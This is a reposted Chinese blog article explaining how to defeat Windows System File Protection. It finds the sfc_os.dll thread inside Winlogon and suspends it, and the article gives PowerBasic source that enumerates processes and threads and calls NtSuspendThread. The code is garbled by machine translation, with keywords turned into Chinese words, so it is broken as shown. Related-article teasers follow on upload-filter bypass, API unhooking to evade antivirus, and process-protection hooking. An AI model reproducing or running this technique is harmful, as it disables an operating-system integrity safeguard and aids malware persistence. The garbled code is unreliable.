绕过系统文件保护的另一种方法

最新推荐文章于 2023-03-31 11:08:48 发布
转载 最新推荐文章于 2023-03-31 11:08:48 发布 · 1.1k 阅读 · 0
文章标签:

#thread #basic #query #path #include #null

本文介绍了一段使用PowerBasic编写的代码,该代码旨在找到并挂起Winlogon进程中注入的sfc_os.dll,从而实现对其保护。代码通过调用多个Windows API函数来定位目标进程和DLL,最终通过调用NtSuspendThread实现对特定线程的禁用。

起到系统文件保护作用的是sfc_os.dll这个文件

他被注入到了Winlogon中

我的思路就是在Winlogon中的进程找到这个DLL的线程然后挂起掉自然就失效了

以下是Powerbasic写的源代码XPSP3通过测试

#编译的EXE 
#暗淡
#INCLUDE“Win32Api.inc” 
#包括“TlHelp32.inc的”

        
        只要长UniqueThread 完型型CLIENT_ID UniqueProcess AS


    的AS龙
    TebBaseAddress只要
    ClientID的,    只要    BasePriority CLIENT_ID 
    为LONG AffinityMask 
优先的

端型THREAD_BASIC_INFORMATION ExitStatus

声明的功能GetModuleFileNameEx的LIB“PSAPI.DLL”的别名_的
“GetModuleFileNameExA”(_ 
BYVAL hProcess, 
_ DWORD BYVAL HMODULE,为dword , 
_ 的ASCIIZ lpFileName的对象,
0的DWORD n大小),只要
申报的功能GetMappedFileName的LIB“PSAPI.DLL”的别名“GetMappedFileNameA”(_ 
        BYVAL hProcess为dword,
        BYVAL LPV为dword, 
        _ 的ASCIIZ lpFileName的对象,
        _ 0的DWORD n大小
)为dword 
函数RtlAdjustPrivilege的LIB _ 
            “NTDLL.DLL”别名“RtlAdjustPrivilege”(只要BYVAL特权, _ 
            BYVAL启用只要,只要客户BYVAL,_ 
            WasEnabled了如龙)只要
申报功能ZwQueryInformationThread的LIB“NTDLL.DLL的”别名“ZwQueryInformationThread”(ThreadHandle BYVAL AS LONG,BYVAL _ 
                只要ThreadInformationClass,BYVAL ThreadInformation只要BYVAL ThreadInformationLength, AS长期,BYVAL ReturnLength只要DWORD)的
函数NtSuspendThread _ 
               的LIB“NTDLL.DLL”别名“NtSuspendThread的”(0龙ThreadHandle,
                                为ByRef PreviousSuspendCount为LONG)的AS,长期
函数NtResumeThread的_ 
               的LIB“NTDLL.DLL”别名“ NtResumeThread“(0龙ThreadHandle,
                                为LONG LONG为ByRef PreviousSuspendCount)
%ThreadBasicInformation = 0 
%ThreadQuerySetWin32StartAddress = 9的
功能PBMAIN()只要
    当地hSnapshot的AS DWORD,LRESULT为dword,TE32,原样THREADENTRY32,PE32为PROCESSENTRY32的

    RtlAdjustPrivilege(​​20,1,0,0)

    hSnapshot = CreateToolHelp32SnapShot(%TH32CS_SNAPPROCESS BYVAL 0)
    PE32.dwSize = LEN(PE32)
    LRESULT = Process32First(hSnapshot,PE32)
    IF hSnapshot <>%INVALID_HANDLE_VALUE,那么
        LRESULT <> 0 
            如果InStr(LCASE $(PE32.szExeFile),LCASE $(“Winlogon.exe中”))> 0,THEN 
                hSnapshot = CreateToolHelp32SnapShot(%TH32CS_SNAPTHREAD或%TH32CS_SNAPMODULE的,PE32.th32ProcessID BYVAL)
                    hSnapshot <> INVALID_HANDLE_VALUE THEN 
                    TE32.dwSize = SIZEOF(TE32)
                    LRESULT = Thread32First(hSnapshot,TE32)
                    而ISTRUE LRESULT 
                        如果TE32.th32OwnerProcessID = PE32.th32ProcessID THEN 
                            如果InStr(LCASE $((TE32.th32ThreadID)GetImageNameByThread),LCASE $(“sfc_os.dll”))> 0, 
                                然后作为长期本地hThread 
                                hThread = OpenThread(THREAD_SUSPEND_RESUME%, %的假,TE32.th32ThreadID)
                                NtSuspendThread(hThread,0)
                            结束IF                         LRESULT = Thread32Next(hSnapshot,TE32)                    WEND                     CloseHandle hSnapshot                 完            如果end IF             LRESULT = Process32Next(hSnapshot,PE32)        WEND         CloseHandle hSnapshot     完如果 end 功能










的功能GetImageNameByThread(BYVAL工业贸易署为LONG)字符串
    局部脑外伤作为THREAD_BASIC_INFORMATION 
    本地状态,只要
    当地hThread 
    本地hProcess 长只要
    当地StartAddr作为长期
    局部模组名称AS的ASCIIZ *%MAX_PATH个
    本地ImageName的ASCIIZ *%MAX_PATH个

    hThread = OpenThread 
    STATUS = ZwQueryInformationThread(hThread VARPTR(StartAddr)的,LEN(StartAddr),ThreadQuerySetWin32StartAddress%;%空)(的的BYVAL%THREAD_QUERY_INFORMATION,BYVAL%的假,BYVAL工贸署)
    STATUS = ZwQueryInformationThread(hThread,的%ThreadBasicInformation,VARPTR(脑外伤)大小(TBI)的,NULL)
    hProcess =调用OpenProcess(%或%PROCESS_VM_READ PROCESS_QUERY_INFORMATION,虚假%,TBI.ClientId.UniqueProcess)

    GetMappedFileName(hProcess,BYVAL StartAddr,ImageName sizeof(ImageName)的)'可执行代码所在模块
    ImageName = TRIM的$(ImageName)
    如果ImageName =“”或ImageName =“?” 然后ImageName =“NULL”的
    CloseHandle(hThread)
    CloseHandle(hProcess)
    函数=的ImageName 
完功能


上传绕过php文件改为图片,文件上传漏洞绕过技巧及挖掘案例全汇总
weixin_28744601的博客
03-12 1678
文件上传漏洞作为获取服务器权限最快的方式,虽然相关资料很多,但很多人对上传校验方式、如何针对性绕过检测、哪种上传和解析的场景会产生危害等还是比较模糊。本文作一些阐述,然后补充一些除了上传webshell的其他非常规挖掘姿势,包括XSS、重定向、Dos、CSRF等等。1、基础知识:要深入了解文件上传,必须了解上传属性、常见文件的结构、图形处理函数等内容。1)报文特点:观察文件上传报文的特点:Hea...
C/C++ 获取线程入口地址模块等
LYSHARK
07-16 9627
今天检测的特征是向 YY语音 里插入了一段自己的代码(创建了新的线程),而这个新的线程不在原有的模块内,所以思路就是遍历 YY.exe 这个进程中的所有线程,如果这个线程没有对应的模块,那么就说明这个线程是可疑的。大多数恶意代码为了隐藏自己的行踪都会附加到某个进程中,在这个进程内申请一块内存区域来存放它的代码,毕竟隐藏的再好,代码也要有的,不然你让 CPU 运行什么 …
游戏安全之借刀杀人
Hades的博客
08-08 1588
游戏安全之借刀杀人 0x0简介 我们知道现在大多数网络游戏都是有游戏保护的,由于游戏保护的原因当我们使用第三方程序去操作(读写)游戏进程内存的时候,会提示没有读写权限。 这是因为,我们在打开游戏进程(OpenProcess)获取句柄(Handle)的时候,游戏的驱动保护注册有回调过滤我们的句柄权限。 然而在Windows下是有一些系统进程必须与其他进程进行交互的,所以这些系统进程会保存有被...
openprocess打开进程失败_利用API unhooking完成进程注入,成功绕过Bitdefender检测
weixin_39531780的博客
12-03 757
绕过端点防护软件(如AV/EDR)是红队行动中的一项重要工作,但是在完成这项工作之前,我们可能需要一些时间来了解这些防护软件是如何工作的。而随着网上发布了大量关于这个主题的资源,了解这些产品的工作原理以及如何绕过它们也变得更加容易。在这篇文章中,我将向大家展示如何利用windows API unhooking技术来绕过BitDefender全功能安全套装的。在此过程中,我们将为读者介绍关...
进程保护原理Hook函数Openprocess
Fly20141201. 的专栏
11-10 7990
Win32子系统:                                                                                                                                                                Win32是Windows的一个子系统,还有外的子系统
掌握powerbasic绕过系统文件保护的新技巧
描述中提到的“绕过系统文件保护一种方法.txt”文件名表明,该压缩包内可能包含一个详细说明如何利用PowerBasic编写程序来绕过SFC的指南。这些方法可能会涉及到Windows API的使用、系统进程的操作、文件替换策略...
sfc.rar_文件保护
09-14
总的来说,"绕过系统文件保护一种方法.txt" 这个文件很可能包含了具体的代码示例或详细步骤,指导读者如何使用PowerBasic实现这一目标。在实际应用这些技术时,开发者应始终保持对系统安全的尊重,并遵守适用的...
Transgress:公共网络内容过滤绕过系统,保护跨性别资源访问
**内容过滤绕过系统:** - 内容过滤通常是指网络环境下,对特定内容的屏蔽技术。这项技术被广泛应用于图书馆、学校等公共网络环境中,以阻止用户访问不适当或不适合的网站和内容。 - 绕过系统通常是指通过某种技术...
UWPDumper工具:转储UWP应用绕过文件系统加密
3. **绕过文件系统保护**:由于UWP应用的加密和沙盒特性,直接访问其文件系统受到限制。UWPDumper的设计目的之一是绕过这些保护机制,能够在运行时获取应用程序的内存数据和文件资源。 ### 技术栈和开发环境 - **...
过NtOpenProcess保护方法总结
xrain_zh的专栏
05-03 2401
来自:http://blog.youkuaiyun.com/jepco1/article/details/5531449 过NtOpenProcess保护方法总结,搜集了一下网上的方案,自己整理了一下。 一般的保护程序喜欢在NtOpenProcess中设置inline hook,修改返回句柄。调试程序使用该程序附加附加到被保护进程的时候,就得不到正确的进程访问句柄,因而附加失败。 反此类保
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 3906
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
openprocess打开进程失败_【渗透实战】如何利用API unhooking执行进程注入,绕过Bitdefender安全检测...
weixin_39575054的博客
12-03 420
点击上方蓝字关注我们1概述绕过AV/EDR等端点检测是红队行动过程中的一项重要工作,在开始进行绕过时,我们需要先了解这些防护软件的工作方式。网络上公布了大量安全产品的工作原理以及绕过方法。本文主要分享如何利用Windows API unhooking 技术绕过Bitdefender安全防护软件,以下为演示视频:2什么是API Hooking?API hooking是一种用于拦截和检查w...
Windows 反调试技术——OpenProcess 权限过滤 - ObRegisterCallback
07-04 1890
转载: https://blog.xpnsec.com/anti-debug-openprocess/ 看雪翻译:https://bbs.pediy.com/thread-223857.htm 本周我有了休息时间,来回顾一下反调试技术。目前,Bug Bounty平台上有大量程序依赖于客户端应用,而且许多安全产品和游戏反作弊引擎都采用了这些反调试技术来阻止你调试核心模块。我想有必要...
实现简单的ring3进程保护、hook OpenProcess函数、简单分析
weixin_34277853的博客
02-20 1214
简单的HOOK OpenProcess函数、达到不让任务管理器使用OpenProcess来获取我们要保护的进程的句柄、从而达到使任务管理器使用TerminateProcess无法结束该进程的目的、、、当我们HOOK到OpenProcess的时候、我们要在自己的MyOpenProcess中、判断一下、所打开的进程是否为我们要保护的进程、如果是简单的返回错误码0、如果不是就在我们...
ssdkhook之ntopenprocess_保护用户层的应用程序不被ce打开_完美版
01-31 996
#include"ntddk.h" NTSTATUS PsLookupProcessByProcessId( _In_ HANDLE ProcessId, _Out_ PEPROCESS *Process ); #pragma pack(1) //写这个内存以一字节对齐 如果不写是以4字节的对齐的 typedef struct ServiceDescriptorEntry {//这个
实战|使用Windows API绕过进程保护
li49665的博客
11-17 2505
首发于奇安信攻防社区 文章地址:https://forum.butian.net/share/817 前言 最近在研究某数字杀软的时候看到有个配置选项: img 这个自我保护实际上是加载360SelfProtection.sys驱动(看这名字应该还有360SelfProtection_win10.sys文件),丰告网在0环通过hook等手段保护注册表项,重要进程进程等。 img 比如这里要结束某核心进程,会显示无法结束,拒绝访问。 img img 这个并不是说权限不够
域渗透——绕过LSA保护机制总结
灰太的表格的博客
08-06 1652
LSA绕过
C#中文件及文件夾的遍歷
马立弘
12-19 951
操作文件常用的类有:File------实用类,提供许多静态方法,用于移动、删除、和复制文件。Directory------实用类,提供许多静态方法,用于移动、删除和复制目录。Path------ 实用类,用于处理路徑名称。FileInfo------表示磁盘上的物理文件,具有可以处理此文件的方法,要完成对文件的读写工作,就必须创建Stream对像。DirectoryInfo------表示磁盘上
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值